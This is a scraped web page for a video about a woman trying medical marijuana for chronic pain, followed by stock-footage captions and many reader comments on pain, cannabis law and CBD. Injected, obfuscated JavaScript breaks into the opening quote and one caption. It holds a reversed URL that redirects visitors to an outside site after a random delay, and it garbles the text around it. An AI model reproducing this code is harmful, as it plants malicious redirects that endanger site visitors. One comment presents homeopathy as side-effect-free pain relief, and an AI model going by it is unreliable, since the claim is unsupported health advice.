I Tried Medical Marijuana For My Chronic Pain

“I’m at a point in my life and my pain where I’m willing toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to try anything.”

Resources for chronic pain:

Resources for medical marijuana reform:


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The Great Depression
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Tomb of Isa Khan at Humayun’s Tomb, Delhi, India- CNGLTRV1109
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The Salvation Army feeding the jobless during the Great Depression
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Illustration of headache concept
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Marijuana leaf
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Paintings Ajanta caves
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Rotating macro product shot of high quality marijuana, on a solid black background
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SLO MO Puffs of smoke around the hemp
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A Man Lights a Smoking Pipe Containing Marijuana
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Marijuana, weed, buds, cannabis, plant, pot
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Comp Add toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Board CU TU Woman giving birth in hospital / Payson, Utah, USA
Mark Andersen/Getty Images
Inside a Marijuana Warehouse
Tribune Broadcasting – Joan De Jesus/Getty Images
1969/1970 ANIMATION letters spelling ‘marijuana’ appearing one by one / turning colors / AUDIO
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Stanley Wong

Dr. Thomas Strouse, MD

Youtube Channel

41 thoughts on “I Tried Medical Marijuana For My Chronic Pain”

  1. Laura Woodman says:

    what is on your inner corner!!

  2. Al Moreau says:

    MARIJUANA is a drug and should be illegal period

  3. WiseWeeabo says:

    Someone who used to smoke weed smokes weed again.

  4. Benjamin Dzakulic says:

    WOW!I didn't know that Kelsey.Very Sad

  5. Outcast Outdoors says:

    The only thing that should be regulated is government.

  6. 5961 4162 says:

    Does anyone think she looks a bit like Casey Novak from svu??

  7. B E says:

    I'm 16 and have chronic pain (I have myalgic encephalomyelitis but the pain is worse than usual due to other stuff) and my mum has always said if it was legal where I live she would let me have it because she hates to see me in pain.

  8. kb1025 says:

    Like many, I had no idea she was suffering from TM. I'm so so happy she found some relief with some of these products! I hope research into medical marijuana is allowed to expand

  9. PsychosisFire says:

    From watching this video, I've come to two conclusions:

    1. The UK needs to start decriminalising cannabis and making it accessible for patients who need it.
    2. The US needs to implement a universal healthcare system.

    In other words, the UK and US need to be like the Netherlands.

  10. gabz1989a says:

    the reaction you have is as bad as mine with tinnitus

  11. cool boy dude says:

    the pharmaceutical companies are trying to make a marijuana illegal so they do not lose money it's sad it could be saving lives like if you agree

  12. TheTruth says:

    does being albino cause it??

  13. TheTruth says:

    TRUMP HATES CANNABIS & WILL CLOSE IT ALL  DOWN!!!!!!!!!!!!!!!!!!!!!!!!!!!1

  14. Musiknird says:

    I have a really aggressive form of rhumatism that's literally destroying my spine and I have chronic pain that is indescribable. I'm swedish and medical marijuana is ofc illegal. A year ago I became so desperate because of the pain and lack of sleep, I started to grow it my self. The combination of cannabis and my other medicines has helped me a lot and improved my life so much. I sleep way better, I can work out and I the stiffness in my spine doesn't effect me as much any longer. If I get cought I would get a big fine, probation, community service or worst case jail. I honestly don't care cause I just know cannabis helps me out.

  15. faustinblak says:

    I smoke to help anxiety but it's never helped with pain. For that I have to take hydro

  16. paparazzidaz says:

    I'm surprised to hear and refuse to believe that any medical professional would describe TN as the worst pain imaginable!! All pain is relative, what may be absolute agony for one person could in fact be nothing more than mild discomfort for another. Chronic pain is a real battle for sufferers, but no-one has more pain than anyone else, the only difference is the individuals coping strategies and the ability to make it through another day.
    PS. I'm speaking from experience.

  17. Faith Gomes says:

    Have you ever tried homeopathy for TN? There are some amazing remedies out there for this specific pain. When you are out of options it's always something to try. It has no side effects.

  18. MissNatalie55555 says:

    Thank you for your honesty x

  19. RosalineScarlett says:

    Props to you, Kelsey, for opening up about something so personal as chronic pain and the treatments you have already sought out. I hope the CBD continues to help you manage the pain. I plan to share this with my parents – my dad has suffered chronic pain from various medical issues for most of his life. Thank you – if this is something that can help people and is being squashed by drug stigmas and Big Pharma, etc., visibility is incredibly important.

  20. Fif 5t. says:

    I'm in CONSTANT chronic pain (sports injuries), yet I'm almost grateful I'm not in as much pain as you. The pain you described and showed examples of I can only IMAGINE how painful it is. It reminded of when I had encephalitis, but even WORSE, and encephalitis is pretty terrible. I feel terrible you have to go through that, Kelsey. Hope you find a way to get better.

  21. piesfaraona says:

    Weird makeup.
    Her eyes look like eyes i sims 2…

  22. CheeseBallWillie says:

    This is why this stuff needs to be funded and researched for proper medical use so people don't have to get medical marijuana cards and not know the proper dose or route they need!

  23. amandarae range says:

    thank you for sharing your experiences <3

  24. Makayla M says:

    I have chronic pain as well and this is very informational. I actually had no clue medical marijuana could help chronic pain. The only person I knew who used it was my Grandmother who had cancer, but I never realized it is used for much more. Thank you for this video.

  25. raghood alqaisi says:

    I know that this isn't what it is about but she is really more beautiful without makeup

  26. Elucidx says:

    Stay away from cartridges. Almost every brand has come back testing positive for pesticides or some form of non approved chemical.

  27. Rebecca Grimes says:

    In case anyone wanted more information about Charlotte's Web, it's an incredible product:


    Get some money off with your purchase too:


  28. Jenn Brown Sculpture says:

    This video was really helpful and informative. I suffer from chronic pain as well. But, of course the only option that is legal everywhere is the most expensive. I've been wanting to try this kind of stuff for a while, but MO still doesn't allow it :/

  29. Alison Na says:

    Oh wow. Even though she's going though she's going through all that pain, she's still looks so happy. I respect you, Kelsey

  30. Bethany Robbins says:

    I've been so against marijuana and this sorta opened my mind

  31. Mimi Jean says:

    Kelsey, I'm so sorry that you've been dealing with this struggle but I'm so happy that you found something that helps.

  32. Tinybear Bri says:

    what do you do with cbd oil…. do you like heat it up or something

  33. Britt Hurley says:

    When I have major migraines, which doesn't happen often thankfully. Marijuana is the only thing that works for me personally. After about a minute or two I'm able to function normally again.

  34. Jarrod Friday says:

    I live in a state where people are still arrested and drug tested for cannabis. My living depends on not getting caught treating myself. It really sucks.

  35. McKenna Kayte says:

    my mother has this disease 🙁

  36. Lub Zhong says:

    we make LED lighting that grow marijuana easy.

  37. Bill Nill says:

    Let's all just get a little high!

  38. Zombie Killa says:

    pharma mafia wont be happy

  39. Jamie Thompson says:

    I SO appreciate this video! I suffer from chronic migraines & I'm from Indiana where it isn't legal yet but I'm a huge advocate for CBD products. I can't wait to either move or for it to be legal. This gave me hope!!

  40. Cyril Ignatious says:

    he sounds like house,md

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